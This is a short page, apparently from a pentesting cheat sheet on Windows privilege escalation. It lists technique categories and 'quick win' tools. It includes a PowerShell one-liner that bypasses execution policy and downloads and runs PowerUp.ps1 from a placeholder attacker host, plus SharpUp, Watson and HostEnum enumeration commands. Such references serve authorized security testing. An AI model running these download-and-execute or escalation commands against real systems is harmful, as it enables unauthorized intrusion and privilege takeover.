Navigation :

Privilege escalation

Index

Patches Detection

Services and Processes

Registry

Schedules Tasks

Startup Applications

Password mining

Impersonation / tokens

Admin2System

Exploits

Privilege abuse

Quick Win

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<ip>/PowerUp.ps1'); Invoke-AllChecks | Out-File -Encoding ASCII checks.txt"

SharpUp.exe

Watson.exe

. .\HostEnum.ps1
Invoke-HostEnum -Local -Privesc -HTMLReport

Enumeration

https://cs.piosky.fr/enumeration/windows/